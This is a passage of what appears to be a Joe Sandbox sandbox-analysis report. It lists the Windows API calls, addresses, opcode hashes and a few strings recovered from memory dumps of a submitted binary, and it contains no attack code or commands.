                                                                                                                • Opcode Fuzzy Hash: 4ad94a914d0d296497b3c43f4fd047da0501b9523262c3baab697820cff82d5e
                                                                                                                • Instruction Fuzzy Hash: 0321A671628251AFCB109F38DC24A6A37A8FB16361F124738F932D71E0F7309890DB90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00939320
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00939352
                                                                                                                • __itow.LIBCMT ref: 0093936A
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00939392
                                                                                                                • __itow.LIBCMT ref: 009393A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2983881199-0
                                                                                                                • Opcode ID: 80aed6066833699a41f7af1b27eceeed8411d1d808bab1ad900ad06839fbb954
                                                                                                                • Instruction ID: 9e1ba763c5898e8d21469fa0e81922ee5f721a87e44a7337c4a90e64397f96bc
                                                                                                                • Opcode Fuzzy Hash: 80aed6066833699a41f7af1b27eceeed8411d1d808bab1ad900ad06839fbb954
                                                                                                                • Instruction Fuzzy Hash: 7C21D771708208BFDB10AA659C85FAE7BADEF89714F044029F905DB1D1D6F0CD459BA2
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00955A6E
                                                                                                                • GetForegroundWindow.USER32 ref: 00955A85
                                                                                                                • GetDC.USER32(00000000), ref: 00955AC1
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00955ACD
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00955B08
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 001eda91563c0e9362b7a4ed40f572c71d9905bbd0c980d2d716f82a99cc5506
                                                                                                                • Instruction ID: b520681513330b2e5b451088ae1a939fd9c86c0e30fde1a8ec90b0fb5a211449
                                                                                                                • Opcode Fuzzy Hash: 001eda91563c0e9362b7a4ed40f572c71d9905bbd0c980d2d716f82a99cc5506
                                                                                                                • Instruction Fuzzy Hash: F921A175A04104AFDB00EF69DC94A9ABBE5EF89351F148479F849D7362CAB0AD04DB90
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008E134D
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 008E135C
                                                                                                                • BeginPath.GDI32(?), ref: 008E1373
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 008E139C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: 50ef0c768f401a60a565b182660e15f63f1a9b8a1c46bddbd7e195a236bf7164
                                                                                                                • Instruction ID: 905d40151b9b9350f78b8bd66f592c4037b8c9f73ca51588f5839ed2fe778264
                                                                                                                • Opcode Fuzzy Hash: 50ef0c768f401a60a565b182660e15f63f1a9b8a1c46bddbd7e195a236bf7164
                                                                                                                • Instruction Fuzzy Hash: 17217430A18648EFDF11CF1AEC487697BA8FF02765F154219F410D66B0D7B89891EF90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: 457817dbb32b254d9c75ebfa4db3bb974a0b71cf00f55913fbcaa433baf148fa
                                                                                                                • Instruction ID: 7780cba3e453ab1ac6892822bcc259fe3a8b0ee38a6851f3347eaa41d1be7565
                                                                                                                • Opcode Fuzzy Hash: 457817dbb32b254d9c75ebfa4db3bb974a0b71cf00f55913fbcaa433baf148fa
                                                                                                                • Instruction Fuzzy Hash: 3401B5B37001067BD2246B159D42FBFB35CDEA1388F088421FF4996292FB60DE118AA0
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00944ABA
                                                                                                                • __beginthreadex.LIBCMT ref: 00944AD8
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00944AED
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00944B03
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00944B0A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                • String ID:
                                                                                                                • API String ID: 3824534824-0
                                                                                                                • Opcode ID: e2856d1526f94e58f2a696e414adf0dba04cb1510171c411f18abcd3813f89c5
                                                                                                                • Instruction ID: 3fd3b23ce98787363e8cadab45ea9a2885dd9c92b141e1c4649fa7ac040505aa
                                                                                                                • Opcode Fuzzy Hash: e2856d1526f94e58f2a696e414adf0dba04cb1510171c411f18abcd3813f89c5
                                                                                                                • Instruction Fuzzy Hash: D1110876A1D618BBC7008FA8EC08F9F7FACEB46360F154269F824D3250D6B1C90497E0
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0093821E
                                                                                                                • GetLastError.KERNEL32(?,00937CE2,?,?,?), ref: 00938228
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00937CE2,?,?,?), ref: 00938237
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00937CE2,?,?,?), ref: 0093823E
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00938255
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: 22531a15e5cb891f0733b8da6be8a6b9a85e2c2978b524d91327ba8ddd3b7908
                                                                                                                • Instruction ID: 9be88cde2c72b61e5c8546d9d385825fd0276f362819c554f0e5101f5f89070c
                                                                                                                • Opcode Fuzzy Hash: 22531a15e5cb891f0733b8da6be8a6b9a85e2c2978b524d91327ba8ddd3b7908
                                                                                                                • Instruction Fuzzy Hash: FF016DB1218608BFDB204FA5EC58D6B7BACFF8A794B50042DF819C2220DAB18C10DA60
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?,?,00937455), ref: 00937127
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937142
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 00937150
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?), ref: 00937160
                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00937044,80070057,?,?), ref: 0093716C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: 9e9430da2786a5313297f48ac007439dfdbb5fe7f0e902ef624bdb507e0ec932
                                                                                                                • Instruction ID: 384ae29b57aba74126114ebf33486ddf7e8a267efe8904ec1d4d5252e39c37c8
                                                                                                                • Opcode Fuzzy Hash: 9e9430da2786a5313297f48ac007439dfdbb5fe7f0e902ef624bdb507e0ec932
                                                                                                                • Instruction Fuzzy Hash: 1C0171B3619208BBDB214FE4EC44AAABBADEB44791F1400A8FD45D3210D771DD40EBA0
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945260
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0094526E
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00945276
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00945280
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: 8e016810a9afc7dfa7ecdcc75ce1e93dbe6fea0203c32d09f74376668c505b80
                                                                                                                • Instruction ID: 514874c8b12084f9e2f11660f6a2d8dbb4b68c8ea2fc9be773fc58207a95814e
                                                                                                                • Opcode Fuzzy Hash: 8e016810a9afc7dfa7ecdcc75ce1e93dbe6fea0203c32d09f74376668c505b80
                                                                                                                • Instruction Fuzzy Hash: 1E016931D19A1DDBCF00EFE4E858AEDBB78FF09711F42045AE961F2241CBB055509BA1
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00938121
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0093812B
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0093813A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00938141
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00938157
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 84018c6abaf3d74803fc9ce74d61e049c4bcafcfa95254991193007a966d40c7
                                                                                                                • Instruction ID: e95e9f7070619bcdadba63b7118ca1b83910698ff89cb774e3ffef88c4260b9c
                                                                                                                • Opcode Fuzzy Hash: 84018c6abaf3d74803fc9ce74d61e049c4bcafcfa95254991193007a966d40c7
                                                                                                                • Instruction Fuzzy Hash: 3CF062B1218304AFEB110FA5EC98E673BACFF4A794F000029F985C6150CBA19D41EE60
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0093C1F7
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0093C20E
                                                                                                                • MessageBeep.USER32(00000000), ref: 0093C226
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0093C242
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0093C25C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: c4432e479f7b53cff94c2fe6a7d034bfefd5de43d162923fb3f9c12cb09275e1
                                                                                                                • Instruction ID: 2cfa491712aa798e0d2b6fa0c87e62123f216a38cce6b5a8f03938b65a8c8167
                                                                                                                • Opcode Fuzzy Hash: c4432e479f7b53cff94c2fe6a7d034bfefd5de43d162923fb3f9c12cb09275e1
                                                                                                                • Instruction Fuzzy Hash: 5D01A270418B08ABEB209B64ED5EB9777B8FB00B06F00066DF552A14E0DBE4A9549F90
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 008E13BF
                                                                                                                • StrokeAndFillPath.GDI32(?,?,0091B888,00000000,?), ref: 008E13DB
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 008E13EE
                                                                                                                • DeleteObject.GDI32 ref: 008E1401
                                                                                                                • StrokePath.GDI32(?), ref: 008E141C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: d7cc52cb73f8835a1d525f29e3c7e986fc2f33a490c0e9f561be9e9596259250
                                                                                                                • Instruction ID: 5acaaba44de53d5dd7f002b6776047163ae0777e0123007730ff96c1e01730db
                                                                                                                • Opcode Fuzzy Hash: d7cc52cb73f8835a1d525f29e3c7e986fc2f33a490c0e9f561be9e9596259250
                                                                                                                • Instruction Fuzzy Hash: 77F0E13012C748EBDB115F1AEC4C7583FA5FB03726F098228E429895F1C7794595EF95
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900DB6: std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                  • Part of subcall function 00900DB6: __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                  • Part of subcall function 008E7A51: _memmove.LIBCMT ref: 008E7AAB
                                                                                                                • __swprintf.LIBCMT ref: 008F2ECD
                                                                                                                Strings
                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008F2D66
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                • Opcode ID: f7f154401a25788210b0fd590ea893709d273b769b54528b298c67b77d0a0043
                                                                                                                • Instruction ID: c9c454a44d531a8feab7f1cf4ee7b07dc43cfe3fb617c90a5ccdef7faed12b04
                                                                                                                • Opcode Fuzzy Hash: f7f154401a25788210b0fd590ea893709d273b769b54528b298c67b77d0a0043
                                                                                                                • Instruction Fuzzy Hash: E69159711082559FC714EF28D885D7EBBA8FF86710F10492DF996DB2A2EB20ED44CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0094B9BB
                                                                                                                • CoCreateInstance.OLE32(00972D6C,00000000,00000001,00972BDC,?), ref: 0094B9D4
                                                                                                                • CoUninitialize.OLE32 ref: 0094B9F1
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                • Opcode ID: c34acf40d87f6c4a28a438221c79a124913effe114807f3a3ef911221dc87f50
                                                                                                                • Instruction ID: fda5633f7d7058b7a9cb7b60ec5916d994b30fd78aaed30db28a58bfdc7b2619
                                                                                                                • Opcode Fuzzy Hash: c34acf40d87f6c4a28a438221c79a124913effe114807f3a3ef911221dc87f50
                                                                                                                • Instruction Fuzzy Hash: F5A18B756043459FCB04DF19C884D6ABBE5FF8A314F148998F8999B3A2CB31EC45CB92
                                                                                                                APIs
                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 009050AD
                                                                                                                  • Part of subcall function 009100F0: __87except.LIBCMT ref: 0091012B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                • Opcode ID: 60d752684db7a766774439e824a35e5fba1f2cb7619ccadd9010d1cf66fb0297
                                                                                                                • Instruction ID: 1c38367c3f78b1a3925ad5b8afcb0169b2e7bc62977a538f451d1a856bd5bc82
                                                                                                                • Opcode Fuzzy Hash: 60d752684db7a766774439e824a35e5fba1f2cb7619ccadd9010d1cf66fb0297
                                                                                                                • Instruction Fuzzy Hash: 09517C31B1C6099ADB127714CD013BF3BE89BC1700F248D59E4D9862E9DE7A8DC4AF86
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$_memmove
                                                                                                                • String ID: ERCP
                                                                                                                • API String ID: 2532777613-1384759551
                                                                                                                • Opcode ID: bb07427525012e0f0433da60b09c48d3ce5100550acb4c9f90dace6b6e45c2bb
                                                                                                                • Instruction ID: 71473f31d5d3fc49e37058c5f86b383fba658108c3f3c72ca96fb9030ccc129a
